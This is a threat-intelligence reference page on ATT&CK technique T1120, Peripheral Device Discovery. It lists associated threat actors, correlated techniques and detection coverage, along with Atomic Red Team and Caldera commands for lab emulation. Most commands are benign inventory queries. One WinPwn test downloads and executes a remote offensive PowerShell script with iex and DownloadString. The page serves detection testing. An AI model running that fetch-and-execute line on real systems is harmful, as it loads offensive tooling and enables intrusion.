Home/ATT&CK Technique/Peripheral Device Discovery
ATT&CK Technique

Peripheral Device Discovery

T1120 · discovery

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.

LinuxmacOSWindows

Actors Using This

7
russiaAPT28
russiaGamaredon Group
chinaMustang Panda
chinaTropic Trooper
russiaTurla
chinaUNC4191
chinaVolt Typhoon

Likely Attack Path

Techniques the same actors pair with this one distinctively - those showing up among actors who use this technique noticeably more than across all actors (lift > 1.15), grouped by kill-chain phase. The × is that lift multiplier; the shared-actor count is in the tooltip. A near-universal technique pairs with everything at baseline, so its list is short by design.
reconnaissance earlier
T1589 · Gather Victim Identity Information ×6.80T1591 · Gather Victim Org Information ×6.00T1589.002 · Email Addresses ×5.91
resource-development earlier
T1584.006 · Web Services ×6.80
privilege-escalation earlier
T1546.015 · Component Object Model Hijacking ×17.00T1546.001 · Change Default File Association ×8.50T1546 · Event Triggered Execution ×5.23
discovery same
T1049 · System Network Connections Discovery ×4.00
lateral-movement later
T1091 · Replication Through Removable Media ×11.33
collection later
T1025 · Data from Removable Media ×9.44
command-and-control later
T1001 · Data Obfuscation ×11.33T1071.003 · Mail Protocols ×6.80
exfiltration later
T1052 · Exfiltration Over Physical Medium ×10.20T1052.001 · Exfiltration over USB ×10.20
other same
T1027.010 · Command Obfuscation ×4.53

Atomic Tests

4
Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
powershellwindowsWin32_PnPEntity Hardware Inventory
Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity
Get-WMIObject Win32_PnPEntity | Format-Table Name, Description, Manufacturer > $env:TEMP\T1120_collection.txt
$Space,$Heading,$Break,$Data = Get-Content $env:TEMP\T1120_collection.txt
@($Heading; $Break; $Data |Sort-Object -Unique) | ? {$_.trim() -ne "" } |Set-Content $env:TEMP\T1120_collection.txt
powershellwindowsWinPwn - printercheck
Search for printers / potential vulns using printercheck function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
printercheck -noninteractive -consoleoutput
command_promptwindowsPeripheral Device Discovery via fsutil
Performs pheripheral device discovery utilizing fsutil to list all drives.
fsutil fsinfo drives
powershellwindowsGet Printer Device List via PowerShell Command
This test uses PowerShell to list printers on a Windows system, demonstrating a discovery technique attackers might use to gather details on connected devices. Using Get-Printer, they can view information on all available printers, identifying potential devices for further targeting. 
Get-Printer

Detection Coverage

1/6 layers
Coverage across standard detection surfaces. Rows marked none have no rule of that type mapped. Some are real blind spots worth closing; others are simply not applicable to this technique (e.g. YARA matches malware files, not network behaviour).
Behavioral / log (Sigma) 2
Analytics (MITRE CAR) none
Runtime / container (Falco) none
File / malware (YARA) none
Network (Suricata/Snort) none
Vuln scan (Nuclei) none

Caldera Emulation

2
MITRE Caldera abilities that emulate this technique - each is an executable action for automated adversary emulation.
discoverydarwinUSB Connected Device Discovery
system_profiler SPUSBDataType
discoverydarwin, linuxView printer queue
lpq -a
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE ATT&CKAtomic Red Teamcar (MITRE)
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin